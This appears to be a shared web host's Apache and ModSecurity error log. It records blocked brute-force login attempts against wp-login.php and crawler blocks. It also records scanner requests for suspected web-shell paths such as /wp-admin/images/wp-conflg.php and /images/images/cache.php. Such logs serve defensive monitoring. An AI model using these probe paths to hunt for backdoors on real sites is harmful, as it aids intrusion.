[Tue May 26 15:28:07.411858 2026] [security2:error] [pid 715645:tid 715837] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVurnVGgMGh8k213Rj0tAAAAD4"]
[Tue May 26 15:28:07.439514 2026] [security2:error] [pid 715645:tid 715821] [client 185.192.71.182:27223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-admin/images/wp-conflg.php"] [unique_id "ahVur3VGgMGh8k213Rj0wwAAAC4"]
[Tue May 26 15:28:10.313359 2026] [security2:error] [pid 715645:tid 715902] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVusXVGgMGh8k213Rj1BAAAAH8"]
[Tue May 26 15:28:12.433930 2026] [security2:error] [pid 715645:tid 715808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVus3VGgMGh8k213Rj1NgAAACE"]
[Tue May 26 15:28:12.622689 2026] [security2:error] [pid 715645:tid 715652] [remote 103.11.102.106:38278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVutHVGgMGh8k213Rj1OgAAQQY"]
[Tue May 26 15:28:12.734137 2026] [security2:error] [pid 715645:tid 715822] [client 114.119.156.165:49365] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/glorod_new/index.php"] [unique_id "ahVutHVGgMGh8k213Rj1RAAAAC8"], referer: http://glorodavionics.com/glorod_new/index.php?route=product%2Fproduct&product_id=51
[Tue May 26 15:28:14.488747 2026] [security2:error] [pid 715645:tid 715891] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVutnVGgMGh8k213Rj1aQAAAHQ"]
[Tue May 26 15:28:15.976593 2026] [security2:error] [pid 715645:tid 715862] [client 74.7.228.60:37244] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "bhavisharchitects.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVut3VGgMGh8k213Rj1kwAAV3M"]
[Tue May 26 15:28:16.358407 2026] [security2:error] [pid 715645:tid 715660] [remote 51.91.98.45:51976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVuuHVGgMGh8k213Rj1mwAAAQ4"]
[Tue May 26 15:28:17.476215 2026] [security2:error] [pid 715645:tid 715822] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuuXVGgMGh8k213Rj1uQAAAC8"]
[Tue May 26 15:28:18.079192 2026] [security2:error] [pid 715645:tid 715899] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuuXVGgMGh8k213Rj12QAAAHw"]
[Tue May 26 15:28:18.977531 2026] [security2:error] [pid 715645:tid 715859] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuunVGgMGh8k213Rj1-AAAAFQ"]
[Tue May 26 15:28:19.039768 2026] [security2:error] [pid 715645:tid 715783] [client 103.151.173.206:63191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_rift_yzddczpizzkshf/yzddczpizzkshf.php"] [unique_id "ahVuunVGgMGh8k213Rj1_QAAAAg"]
[Tue May 26 15:28:19.318227 2026] [security2:error] [pid 715645:tid 715887] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuu3VGgMGh8k213Rj2AgAAAHA"]
[Tue May 26 15:28:19.751343 2026] [security2:error] [pid 715645:tid 715799] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuu3VGgMGh8k213Rj2BwAAABg"]
[Tue May 26 15:28:19.766723 2026] [security2:error] [pid 715645:tid 715899] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuu3VGgMGh8k213Rj2EgAAAHw"]
[Tue May 26 15:28:20.084462 2026] [security2:error] [pid 715645:tid 715880] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvHVGgMGh8k213Rj2HwAAAGk"]
[Tue May 26 15:28:20.397958 2026] [security2:error] [pid 715645:tid 715816] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvHVGgMGh8k213Rj2JAAAACk"]
[Tue May 26 15:28:20.402579 2026] [security2:error] [pid 715645:tid 715789] [client 103.151.173.206:54592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_rift_hapsqwdeordcfw/hapsqwdeordcfw.php"] [unique_id "ahVuvHVGgMGh8k213Rj2KwAAAA4"]
[Tue May 26 15:28:20.708259 2026] [security2:error] [pid 715645:tid 715835] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvHVGgMGh8k213Rj2MQAAADw"]
[Tue May 26 15:28:21.034240 2026] [security2:error] [pid 715645:tid 715868] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvHVGgMGh8k213Rj2PQAAAF0"]
[Tue May 26 15:28:21.406841 2026] [security2:error] [pid 715645:tid 715892] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvXVGgMGh8k213Rj2RgAAAHU"]
[Tue May 26 15:28:21.714397 2026] [security2:error] [pid 715645:tid 715825] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvXVGgMGh8k213Rj2TwAAADI"]
[Tue May 26 15:28:21.956214 2026] [security2:error] [pid 715645:tid 715745] [remote 3.208.180.187:43062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVuvXVGgMGh8k213Rj2WQAAGGM"]
[Tue May 26 15:28:21.989171 2026] [security2:error] [pid 715645:tid 715775] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvXVGgMGh8k213Rj2XwAAAAA"]
[Tue May 26 15:28:22.139181 2026] [security2:error] [pid 715645:tid 715901] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuvXVGgMGh8k213Rj2VQAAAH4"]
[Tue May 26 15:28:22.233505 2026] [security2:error] [pid 715645:tid 715884] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvnVGgMGh8k213Rj2aAAAAG0"]
[Tue May 26 15:28:22.536357 2026] [security2:error] [pid 715645:tid 715860] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvnVGgMGh8k213Rj2cAAAAFU"]
[Tue May 26 15:28:22.803907 2026] [security2:error] [pid 715645:tid 715819] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuvnVGgMGh8k213Rj2eQAAACw"]
[Tue May 26 15:28:23.123131 2026] [security2:error] [pid 715645:tid 715808] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuv3VGgMGh8k213Rj2fwAAACE"]
[Tue May 26 15:28:23.478450 2026] [security2:error] [pid 715645:tid 715840] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuv3VGgMGh8k213Rj2iAAAAEE"]
[Tue May 26 15:28:23.799765 2026] [security2:error] [pid 715645:tid 715883] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuv3VGgMGh8k213Rj2lAAAAGw"]
[Tue May 26 15:28:23.875725 2026] [security2:error] [pid 715645:tid 715895] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuv3VGgMGh8k213Rj2iwAAAHg"]
[Tue May 26 15:28:24.107862 2026] [security2:error] [pid 715645:tid 715880] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwHVGgMGh8k213Rj2nQAAAGk"]
[Tue May 26 15:28:24.684426 2026] [security2:error] [pid 715645:tid 715802] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwHVGgMGh8k213Rj2rAAAABs"]
[Tue May 26 15:28:24.982708 2026] [security2:error] [pid 715645:tid 715819] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwHVGgMGh8k213Rj2uAAAACw"]
[Tue May 26 15:28:25.333965 2026] [security2:error] [pid 715645:tid 715838] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwXVGgMGh8k213Rj2uwAAAD8"]
[Tue May 26 15:28:25.623049 2026] [security2:error] [pid 715645:tid 715830] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwXVGgMGh8k213Rj2ygAAADc"]
[Tue May 26 15:28:26.286330 2026] [security2:error] [pid 715645:tid 715880] [client 3.237.65.43:52298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahVuwnVGgMGh8k213Rj22gAAAGk"], referer: www.google.com
[Tue May 26 15:28:26.313187 2026] [security2:error] [pid 715645:tid 715785] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuwXVGgMGh8k213Rj20wAAAAo"]
[Tue May 26 15:28:26.503158 2026] [security2:error] [pid 715645:tid 715884] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwnVGgMGh8k213Rj24wAAAG0"]
[Tue May 26 15:28:27.072079 2026] [security2:error] [pid 715645:tid 715778] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuwnVGgMGh8k213Rj29wAAAAM"]
[Tue May 26 15:28:27.624583 2026] [security2:error] [pid 715645:tid 715890] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuw3VGgMGh8k213Rj3BgAAAHM"]
[Tue May 26 15:28:27.919311 2026] [security2:error] [pid 715645:tid 715686] [remote 101.99.50.238:33916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVuw3VGgMGh8k213Rj3EAAAMig"]
[Tue May 26 15:28:28.106289 2026] [security2:error] [pid 715645:tid 715870] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxHVGgMGh8k213Rj3IQAAAF8"]
[Tue May 26 15:28:28.134641 2026] [security2:error] [pid 715645:tid 715880] [client 3.237.65.43:55836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahVuxHVGgMGh8k213Rj3KAAAAGk"], referer: www.google.com
[Tue May 26 15:28:28.528175 2026] [security2:error] [pid 715645:tid 715878] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuxHVGgMGh8k213Rj3JwAAAGc"]
[Tue May 26 15:28:28.530833 2026] [security2:error] [pid 715645:tid 715900] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxHVGgMGh8k213Rj3KwAAAH0"]
[Tue May 26 15:28:28.788958 2026] [authz_core:error] [pid 715645:tid 715893] [client 103.151.173.206:59697] AH01630: client denied by server configuration: /home2/paqys91a/public_html/themes/default-bootstrap
[Tue May 26 15:28:28.906074 2026] [security2:error] [pid 715645:tid 715827] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxHVGgMGh8k213Rj3QQAAADQ"]
[Tue May 26 15:28:28.924147 2026] [security2:error] [pid 715645:tid 715817] [client 123.23.110.251:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuxHVGgMGh8k213Rj3MwAAACo"]
[Tue May 26 15:28:29.193921 2026] [security2:error] [pid 715645:tid 715895] [client 188.130.219.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuxXVGgMGh8k213Rj3TgAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:28:29.269820 2026] [cgid:error] [pid 715645:tid 715882] [client 185.192.71.180:0] AH01265: stderr from /home1/moesartc/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 15:28:29.520154 2026] [security2:error] [pid 715645:tid 715880] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxXVGgMGh8k213Rj3WwAAAGk"]
[Tue May 26 15:28:29.901815 2026] [security2:error] [pid 715645:tid 715869] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxXVGgMGh8k213Rj3ZgAAAF4"]
[Tue May 26 15:28:30.337316 2026] [security2:error] [pid 715645:tid 715800] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxnVGgMGh8k213Rj3eAAAABk"]
[Tue May 26 15:28:30.865560 2026] [security2:error] [pid 715645:tid 715807] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuxnVGgMGh8k213Rj3jgAAACA"]
[Tue May 26 15:28:30.880729 2026] [authz_core:error] [pid 715645:tid 715789] [client 103.151.173.206:50444] AH01630: client denied by server configuration: /home2/paqys91a/public_html/themes/default-bootstrap
[Tue May 26 15:28:31.007670 2026] [security2:error] [pid 715645:tid 715901] [client 188.130.219.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuxnVGgMGh8k213Rj3mAAAAH4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1222623&moderation-hash=67bc8b9e3fc27b62608cbf52fb92bb56
[Tue May 26 15:28:31.091717 2026] [security2:error] [pid 715645:tid 715849] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuxnVGgMGh8k213Rj3igAAAEo"]
[Tue May 26 15:28:31.409249 2026] [security2:error] [pid 715645:tid 715870] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVux3VGgMGh8k213Rj3nwAAAF8"]
[Tue May 26 15:28:31.723693 2026] [security2:error] [pid 715645:tid 715826] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVux3VGgMGh8k213Rj3qAAAADM"]
[Tue May 26 15:28:32.467236 2026] [security2:error] [pid 715645:tid 715856] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuyHVGgMGh8k213Rj3wAAAAFE"]
[Tue May 26 15:28:32.712933 2026] [authz_core:error] [pid 715645:tid 715840] [client 103.151.173.206:58342] AH01630: client denied by server configuration: /home2/paqys91a/public_html/themes/classic/
[Tue May 26 15:28:33.427297 2026] [security2:error] [pid 715645:tid 715846] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuyXVGgMGh8k213Rj32wAAAEc"]
[Tue May 26 15:28:33.813934 2026] [security2:error] [pid 715645:tid 715847] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuyXVGgMGh8k213Rj37gAAAEg"]
[Tue May 26 15:28:33.891631 2026] [security2:error] [pid 715645:tid 715881] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuyXVGgMGh8k213Rj35AAAAGo"]
[Tue May 26 15:28:34.213836 2026] [security2:error] [pid 715645:tid 715814] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuynVGgMGh8k213Rj3-QAAACc"]
[Tue May 26 15:28:34.718596 2026] [security2:error] [pid 715645:tid 715861] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuynVGgMGh8k213Rj4BgAAAFY"]
[Tue May 26 15:28:35.228357 2026] [security2:error] [pid 715645:tid 715822] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuy3VGgMGh8k213Rj4FgAAAC8"]
[Tue May 26 15:28:35.697860 2026] [security2:error] [pid 715645:tid 715858] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuy3VGgMGh8k213Rj4IwAAAFM"]
